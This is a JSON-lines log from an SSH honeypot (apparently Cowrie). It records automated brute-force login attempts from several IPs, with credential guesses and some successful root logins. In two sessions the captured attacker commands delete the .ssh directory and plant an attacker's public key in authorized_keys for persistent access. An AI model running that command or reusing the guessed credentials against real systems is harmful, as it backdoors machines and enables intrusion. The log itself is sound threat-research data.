{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:29:42.176090Z","src_ip":"24.108.102.132","session":"d5110e4bfe2e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:29:42.338655Z","src_ip":"24.108.102.132","session":"d5110e4bfe2e"}
{"eventid":"cowrie.login.failed","username":"parth","password":"parth","message":"login attempt [parth/parth] failed","sensor":"my-vps","timestamp":"2025-08-26T00:29:42.999490Z","src_ip":"24.108.102.132","session":"d5110e4bfe2e"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:29:44.165196Z","src_ip":"24.108.102.132","session":"d5110e4bfe2e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":1233,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c8041d10d62","protocol":"ssh","message":"New connection: 212.227.235.229:1233 (1.2.3.4:22) [session: 4c8041d10d62]","sensor":"my-vps","timestamp":"2025-08-26T00:29:53.739005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T00:29:53.739758Z","src_ip":"212.227.235.229","session":"4c8041d10d62"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T00:29:53.868066Z","src_ip":"212.227.235.229","session":"4c8041d10d62"}
{"eventid":"cowrie.login.failed","username":"adm","password":"123456","message":"login attempt [adm/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T00:29:54.467219Z","src_ip":"212.227.235.229","session":"4c8041d10d62"}
{"eventid":"cowrie.login.failed","username":"adm","password":"abc123","message":"login attempt [adm/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T00:29:55.598259Z","src_ip":"212.227.235.229","session":"4c8041d10d62"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":53792,"dst_ip":"1.2.3.4","dst_port":22,"session":"d27e95283e75","protocol":"ssh","message":"New connection: 27.112.78.245:53792 (1.2.3.4:22) [session: d27e95283e75]","sensor":"my-vps","timestamp":"2025-08-26T00:29:56.049587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:29:56.051256Z","src_ip":"27.112.78.245","session":"d27e95283e75"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:29:56.310918Z","src_ip":"27.112.78.245","session":"d27e95283e75"}
{"eventid":"cowrie.login.failed","username":"adm","password":"abcd123","message":"login attempt [adm/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-26T00:29:56.728183Z","src_ip":"212.227.235.229","session":"4c8041d10d62"}
{"eventid":"cowrie.login.success","username":"root","password":"rootPassword1!","message":"login attempt [root/rootPassword1!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:29:57.394113Z","src_ip":"27.112.78.245","session":"d27e95283e75"}
{"eventid":"cowrie.login.failed","username":"adm","password":"abcd1234","message":"login attempt [adm/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-26T00:29:57.858804Z","src_ip":"212.227.235.229","session":"4c8041d10d62"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:29:57.967280Z","src_ip":"27.112.78.245","session":"d27e95283e75"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:29:57.968136Z","src_ip":"27.112.78.245","session":"d27e95283e75"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:29:57.969344Z","src_ip":"27.112.78.245","session":"d27e95283e75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:29:58.232447Z","src_ip":"27.112.78.245","session":"d27e95283e75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:29:58.815934Z","src_ip":"27.112.78.245","session":"d27e95283e75"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:29:58.816945Z","src_ip":"27.112.78.245","session":"d27e95283e75"}
{"eventid":"cowrie.login.failed","username":"adm","password":"abc1234","message":"login attempt [adm/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-26T00:29:58.990103Z","src_ip":"212.227.235.229","session":"4c8041d10d62"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:29:59.080140Z","src_ip":"27.112.78.245","session":"d27e95283e75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:29:59.081264Z","src_ip":"27.112.78.245","session":"d27e95283e75"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":53794,"dst_ip":"1.2.3.4","dst_port":22,"session":"06e173ab2639","protocol":"ssh","message":"New connection: 27.112.78.245:53794 (1.2.3.4:22) [session: 06e173ab2639]","sensor":"my-vps","timestamp":"2025-08-26T00:29:59.354705Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:29:59.355975Z","src_ip":"27.112.78.245","session":"06e173ab2639"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:29:59.623967Z","src_ip":"27.112.78.245","session":"06e173ab2639"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:30:00.137377Z","src_ip":"212.227.235.229","session":"4c8041d10d62"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:30:00.754574Z","src_ip":"27.112.78.245","session":"06e173ab2639"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:30:02.026037Z","src_ip":"27.112.78.245","session":"06e173ab2639"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":53810,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b3b995169b0","protocol":"ssh","message":"New connection: 27.112.78.245:53810 (1.2.3.4:22) [session: 0b3b995169b0]","sensor":"my-vps","timestamp":"2025-08-26T00:30:02.298099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:30:02.299255Z","src_ip":"27.112.78.245","session":"0b3b995169b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:30:02.577034Z","src_ip":"27.112.78.245","session":"0b3b995169b0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:30:03.706534Z","src_ip":"27.112.78.245","session":"0b3b995169b0"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:30:03.978186Z","src_ip":"27.112.78.245","session":"d27e95283e75"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:30:03.979175Z","src_ip":"27.112.78.245","session":"0b3b995169b0"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":39314,"dst_ip":"1.2.3.4","dst_port":22,"session":"6456dcde01fd","protocol":"ssh","message":"New connection: 45.159.112.103:39314 (1.2.3.4:22) [session: 6456dcde01fd]","sensor":"my-vps","timestamp":"2025-08-26T00:30:29.765697Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:30:29.766493Z","src_ip":"45.159.112.103","session":"6456dcde01fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:30:29.881585Z","src_ip":"45.159.112.103","session":"6456dcde01fd"}
{"eventid":"cowrie.login.success","username":"root","password":"Asdf123!","message":"login attempt [root/Asdf123!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:30:30.381502Z","src_ip":"45.159.112.103","session":"6456dcde01fd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:30:30.630992Z","src_ip":"45.159.112.103","session":"6456dcde01fd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:30:30.631773Z","src_ip":"45.159.112.103","session":"6456dcde01fd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:30:30.633194Z","src_ip":"45.159.112.103","session":"6456dcde01fd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:30:30.749070Z","src_ip":"45.159.112.103","session":"6456dcde01fd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:30:31.081044Z","src_ip":"45.159.112.103","session":"6456dcde01fd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:30:31.081703Z","src_ip":"45.159.112.103","session":"6456dcde01fd"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:30:31.199089Z","src_ip":"45.159.112.103","session":"6456dcde01fd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:30:31.199922Z","src_ip":"45.159.112.103","session":"6456dcde01fd"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":39324,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa5c4a3dce60","protocol":"ssh","message":"New connection: 45.159.112.103:39324 (1.2.3.4:22) [session: fa5c4a3dce60]","sensor":"my-vps","timestamp":"2025-08-26T00:30:31.309483Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:30:31.310578Z","src_ip":"45.159.112.103","session":"fa5c4a3dce60"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:30:31.424248Z","src_ip":"45.159.112.103","session":"fa5c4a3dce60"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:30:31.920218Z","src_ip":"45.159.112.103","session":"fa5c4a3dce60"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:30:33.036580Z","src_ip":"45.159.112.103","session":"fa5c4a3dce60"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":39326,"dst_ip":"1.2.3.4","dst_port":22,"session":"90bfeb69ac8d","protocol":"ssh","message":"New connection: 45.159.112.103:39326 (1.2.3.4:22) [session: 90bfeb69ac8d]","sensor":"my-vps","timestamp":"2025-08-26T00:30:33.146111Z"}
